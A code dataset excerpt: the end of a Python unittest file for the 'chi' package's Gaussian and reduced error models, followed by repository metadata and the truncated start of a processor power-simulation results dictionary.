def test_sample(self):
# Test I: sample size 1
seed = 42
parameters = [2]
n_times = 3
model_output = [1, 10, 100]
sample = self.error_model.sample(parameters, model_output, seed=seed)
n_samples = 1
self.assertEqual(sample.shape, (n_times, n_samples))
self.assertAlmostEqual(sample[0, 0], 1.6094341595088628)
self.assertAlmostEqual(sample[1, 0], -10.799682124809912)
self.assertAlmostEqual(sample[2, 0], 250.09023916129144)
# Test II: sample size > 1
n_samples = 4
sample = self.error_model.sample(
parameters, model_output, n_samples=n_samples, seed=seed)
self.assertEqual(sample.shape, (n_times, n_samples))
self.assertAlmostEqual(sample[0, 0], 1.6094341595088628)
self.assertAlmostEqual(sample[1, 0], -29.020703773076725)
self.assertAlmostEqual(sample[2, 0], 96.63976849914224)
self.assertAlmostEqual(sample[0, 1], -1.079968212480991)
self.assertAlmostEqual(sample[1, 1], -16.043590137246362)
self.assertAlmostEqual(sample[2, 1], -70.608785514716)
self.assertAlmostEqual(sample[0, 2], 2.5009023916129145)
self.assertAlmostEqual(sample[1, 2], 12.556808063345708)
self.assertAlmostEqual(sample[2, 2], 275.8795949725657)
self.assertAlmostEqual(sample[0, 3], 2.8811294327824277)
self.assertAlmostEqual(sample[1, 3], 3.6751481531283563)
self.assertAlmostEqual(sample[2, 3], 255.55838708578966)
def test_sample_bad_input(self):
# Too many paramaters
parameters = [1, 1, 1, 1, 1]
model_output = [1] * 10
with self.assertRaisesRegex(ValueError, 'The number of provided'):
self.error_model.sample(parameters, model_output)
def test_set_parameter_names(self):
# Set parameter names
names = ['some name']
self.error_model.set_parameter_names(names)
parameters = self.error_model.get_parameter_names()
self.assertEqual(len(parameters), 1)
self.assertEqual(parameters[0], 'some name')
# Reset parameter names
names = None
self.error_model.set_parameter_names(names)
parameters = self.error_model.get_parameter_names()
self.assertEqual(len(parameters), 1)
self.assertEqual(parameters[0], 'Sigma rel.')
def test_set_parameter_names_bad_input(self):
# Not the right number of names
names = ['Too', 'many', 'names']
with self.assertRaisesRegex(ValueError, 'Length of names'):
self.error_model.set_parameter_names(names)
class TestReducedErrorModel(unittest.TestCase):
"""
Tests the erlotinib.ReducedErrorModel class.
"""
@classmethod
def setUpClass(cls):
error_model = chi.ConstantAndMultiplicativeGaussianErrorModel()
cls.error_model = chi.ReducedErrorModel(error_model)
def test_bad_instantiation(self):
model = 'Bad type'
with self.assertRaisesRegex(ValueError, 'The error model'):
chi.ReducedErrorModel(model)
def test_compute_log_likelihood(self):
# Tests :meth:`compute_log_likelihood` and
# :meth:`compute_pointwise_ll`
# Test case I: fix some parameters
self.error_model.fix_parameters(name_value_dict={
'Sigma base': 0.1})
# Compute log-likelihood
parameters = [0.2]
model_output = [1, 2, 3, 4]
observations = [2, 3, 4, 5]
pw_score = self.error_model.compute_pointwise_ll(
parameters, model_output, observations)
score = self.error_model.compute_log_likelihood(
parameters, model_output, observations)
# Compute ref score with original error model
parameters = [0.1, 0.2]
error_model = self.error_model.get_error_model()
ref_score = error_model.compute_log_likelihood(
parameters, model_output, observations)
self.assertEqual(score, ref_score)
self.assertEqual(pw_score.shape, (4,))
self.assertAlmostEqual(np.sum(pw_score), ref_score)
# Unfix model parameters
self.error_model.fix_parameters(name_value_dict={
'Sigma base': None})
def test_compute_sensitivities(self):
# Test case I: fix some parameters
self.error_model.fix_parameters(name_value_dict={
'Sigma base': 0.1})
# Compute log-likelihood and sensitivities
parameters = [0.2]
model_output = [1, 2, 3, 4]
observations = [2, 3, 4, 5]
m_sens = np.array([[1, 2, 3, 4], [1, 1, 1, 1]]).T
score, sens = self.error_model.compute_sensitivities(
parameters, model_output, m_sens, observations)
# Compute ref score with original error model
parameters = [0.1, 0.2]
error_model = self.error_model.get_error_model()
ref_score, ref_sens = error_model.compute_sensitivities(
parameters, model_output, m_sens, observations)
self.assertEqual(score, ref_score)
self.assertEqual(len(sens), 3)
self.assertEqual(len(ref_sens), 4)
self.assertEqual(sens[0], ref_sens[0])
self.assertEqual(sens[1], ref_sens[1])
self.assertEqual(sens[2], ref_sens[3])
# Unfix model parameters
self.error_model.fix_parameters(name_value_dict={
'Sigma base': None})
# Compute log-likelihood and sensitivities
parameters = [0.1, 0.2]
score, sens = self.error_model.compute_sensitivities(
parameters, model_output, m_sens, observations)
self.assertEqual(score, ref_score)
self.assertEqual(len(sens), 4)
self.assertEqual(len(ref_sens), 4)
self.assertEqual(sens[0], ref_sens[0])
self.assertEqual(sens[1], ref_sens[1])
self.assertEqual(sens[2], ref_sens[2])
self.assertEqual(sens[3], ref_sens[3])
def test_fix_parameters(self):
# Test case I: fix some parameters
self.error_model.fix_parameters(name_value_dict={
'Sigma rel.': 1})
n_parameters = self.error_model.n_parameters()
self.assertEqual(n_parameters, 1)
parameter_names = self.error_model.get_parameter_names()
self.assertEqual(len(parameter_names), 1)
self.assertEqual(parameter_names[0], 'Sigma base')
# Test case II: fix overlapping set of parameters
self.error_model.fix_parameters(name_value_dict={
'Sigma base': 0.2,
'Sigma rel.': 0.1})
n_parameters = self.error_model.n_parameters()
self.assertEqual(n_parameters, 0)
parameter_names = self.error_model.get_parameter_names()
self.assertEqual(len(parameter_names), 0)
# Test case III: unfix all parameters
self.error_model.fix_parameters(name_value_dict={
'Sigma base': None,
'Sigma rel.': None})
n_parameters = self.error_model.n_parameters()
self.assertEqual(n_parameters, 2)
parameter_names = self.error_model.get_parameter_names()
self.assertEqual(len(parameter_names), 2)
self.assertEqual(parameter_names[0], 'Sigma base')
self.assertEqual(parameter_names[1], 'Sigma rel.')
def test_fix_parameters_bad_input(self):
name_value_dict = 'Bad type'
with self.assertRaisesRegex(ValueError, 'The name-value dictionary'):
self.error_model.fix_parameters(name_value_dict)
def test_get_error_model(self):
error_model = self.error_model.get_error_model()
self.assertIsInstance(error_model, chi.ErrorModel)
def test_n_fixed_parameters(self):
# Test case I: fix some parameters
self.error_model.fix_parameters(name_value_dict={
'Sigma base': 0.1})
self.assertEqual(self.error_model.n_fixed_parameters(), 1)
# Unfix all parameters
self.error_model.fix_parameters(name_value_dict={
'Sigma base': None})
self.assertEqual(self.error_model.n_fixed_parameters(), 0)
def test_n_parameters(self):
n_parameters = self.error_model.n_parameters()
self.assertEqual(n_parameters, 2)
def test_sample(self):
# Test case I: fix some parameters
self.error_model.fix_parameters(name_value_dict={
'Sigma base': 0.1})
# Sample
seed = 42
n_samples = 1
parameters = [0.2]
model_output = [1, 2, 3, 4]
samples = self.error_model.sample(
parameters, model_output, n_samples, seed)
# Compute ref score with original error model
parameters = [0.1, 0.2]
error_model = self.error_model.get_error_model()
ref_samples = error_model.sample(
parameters, model_output, n_samples, seed)
self.assertEqual(samples.shape, (4, 1))
self.assertEqual(ref_samples.shape, (4, 1))
self.assertEqual(samples[0, 0], ref_samples[0, 0])
self.assertEqual(samples[1, 0], ref_samples[1, 0])
self.assertEqual(samples[2, 0], ref_samples[2, 0])
self.assertEqual(samples[3, 0], ref_samples[3, 0])
# Unfix model parameters
self.error_model.fix_parameters(name_value_dict={
'Sigma base': None})
def test_set_get_parameter_names(self):
# Set some parameter names
self.error_model.set_parameter_names(['Test 1', 'Test 2'])
names = self.error_model.get_parameter_names()
self.assertEqual(len(names), 2)
self.assertEqual(names[0], 'Test 1')
self.assertEqual(names[1], 'Test 2')
# Reset to defaults
self.error_model.set_parameter_names(None)
names = self.error_model.get_parameter_names()
self.assertEqual(len(names), 2)
self.assertEqual(names[0], 'Sigma base')
self.assertEqual(names[1], 'Sigma rel.')
# Fix parameter and set parameter name
self.error_model.fix_parameters(name_value_dict={
'Sigma base': 1})
self.error_model.set_parameter_names(
['myokit.tumour_volume Sigma rel.'])
names = self.error_model.get_parameter_names()
self.assertEqual(len(names), 1)
self.assertEqual(names[0], 'myokit.tumour_volume Sigma rel.')
# Reset to defaults
self.error_model.set_parameter_names(None)
names = self.error_model.get_parameter_names()
self.assertEqual(len(names), 1)
self.assertEqual(names[0], 'Sigma rel.')
# Unfix model parameters
self.error_model.fix_parameters(name_value_dict={
'Sigma base': None})
def test_set_parameter_names_bad_input(self):
# Wrong number of names
names = ['Wrong length']
with self.assertRaisesRegex(ValueError, 'Length of names does not'):
self.error_model.set_parameter_names(names)
# A parameter exceeds 50 characters
names = [
'0123456789-0123456789-0123456789-0123456789-0123456789-012345678',
'Sigma base']
with self.assertRaisesRegex(ValueError, 'Parameter names cannot'):
self.error_model.set_parameter_names(names)
if __name__ == '__main__':
unittest.main()
| 37.367039
| 79
| 0.614426
| 7,122
| 56,910
| 4.718478
| 0.030188
| 0.058325
| 0.071656
| 0.055617
| 0.937271
| 0.904508
| 0.88954
| 0.872281
| 0.857313
| 0.842761
| 0
| 0.0535
| 0.270199
| 56,910
| 1,522
| 80
| 37.39159
| 0.755616
| 0.098401
| 0
| 0.839423
| 0
| 0
| 0.030855
| 0.001254
| 0
| 0
| 0
| 0
| 0.298077
| 1
| 0.061538
| false
| 0
| 0.002885
| 0
| 0.070192
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
98ef6584bd95a075dbc92a23dc5f332a334d2483
| 68,627
|
py
|
Python
|
benchmarks/SimResults/combinations_spec_ml_deepnet/cmp_bwavesgcccactusADMmilc/power.py
|
TugberkArkose/MLScheduler
|
e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061
|
[
"Unlicense"
] | null | null | null |
benchmarks/SimResults/combinations_spec_ml_deepnet/cmp_bwavesgcccactusADMmilc/power.py
|
TugberkArkose/MLScheduler
|
e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061
|
[
"Unlicense"
] | null | null | null |
benchmarks/SimResults/combinations_spec_ml_deepnet/cmp_bwavesgcccactusADMmilc/power.py
|
TugberkArkose/MLScheduler
|
e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061
|
[
"Unlicense"
] | null | null | null |
power = {'BUSES': {'Area': 1.33155,
'Bus/Area': 1.33155,
'Bus/Gate Leakage': 0.00662954,
'Bus/Peak Dynamic': 0.0,
'Bus/Runtime Dynamic': 0.0,
'Bus/Subthreshold Leakage': 0.0691322,
'Bus/Subthreshold Leakage with power gating': 0.0259246,
'Gate Leakage': 0.00662954,
'Peak Dynamic': 0.0,
'Runtime Dynamic': 0.0,
'Subthreshold Leakage': 0.0691322,
'Subthreshold Leakage with power gating': 0.0259246},
'Core': [{'Area': 32.6082,
'Execution Unit/Area': 8.2042,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.113472,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.291815,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.692681,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.122718,
'Execution Unit/Instruction Scheduler/Area': 2.17927,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.328073,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.00115349,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.20978,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.367774,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.017004,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00962066,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00730101,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 1.00996,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00529112,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 2.07911,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.636852,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0800117,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0455351,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 4.84781,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.841232,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.000856399,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.55892,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.365253,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.0178624,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00897339,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 1.36988,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.114878,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.0641291,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.257333,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 6.5717,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.130862,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.0133321,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.135642,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0985991,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.266504,
'Execution Unit/Register Files/Runtime Dynamic': 0.111931,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0442632,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00607074,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.358853,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.918468,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.0920413,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0345155,
'Execution Unit/Runtime Dynamic': 3.09747,
'Execution Unit/Subthreshold Leakage': 1.83518,
'Execution Unit/Subthreshold Leakage with power gating': 0.709678,
'Gate Leakage': 0.372997,
'Instruction Fetch Unit/Area': 5.86007,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00133722,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00133722,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.00117013,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000455941,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.00141638,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00526096,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.0126276,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0590479,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0947859,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 6.02919,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.266465,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.321935,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 8.54479,
'Instruction Fetch Unit/Runtime Dynamic': 0.701075,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932587,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.408542,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0784516,
'L2/Runtime Dynamic': 0.0170574,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80969,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 4.87526,
'Load Store Unit/Data Cache/Runtime Dynamic': 1.76986,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0351387,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.117703,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.117702,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 5.43334,
'Load Store Unit/Runtime Dynamic': 2.46803,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.290234,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.580469,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591622,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283406,
'Memory Management Unit/Area': 0.434579,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.103005,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.104066,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00813591,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.374873,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0440318,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.711448,
'Memory Management Unit/Runtime Dynamic': 0.148097,
'Memory Management Unit/Subthreshold Leakage': 0.0769113,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0399462,
'Peak Dynamic': 25.9014,
'Renaming Unit/Area': 0.369768,
'Renaming Unit/FP Front End RAT/Area': 0.168486,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00489731,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 3.33511,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.456548,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0437281,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.024925,
'Renaming Unit/Free List/Area': 0.0414755,
'Renaming Unit/Free List/Gate Leakage': 4.15911e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0401324,
'Renaming Unit/Free List/Runtime Dynamic': 0.0242997,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000670426,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000377987,
'Renaming Unit/Gate Leakage': 0.00863632,
'Renaming Unit/Int Front End RAT/Area': 0.114751,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.00038343,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.86945,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.182883,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00611897,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00348781,
'Renaming Unit/Peak Dynamic': 4.56169,
'Renaming Unit/Runtime Dynamic': 0.663731,
'Renaming Unit/Subthreshold Leakage': 0.070483,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0362779,
'Runtime Dynamic': 7.09547,
'Subthreshold Leakage': 6.21877,
'Subthreshold Leakage with power gating': 2.58311},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0503463,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.242233,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.298709,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.15454,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.249267,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.125822,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.529629,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.130953,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 4.59001,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0564325,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.00648211,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.064632,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0479391,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.121065,
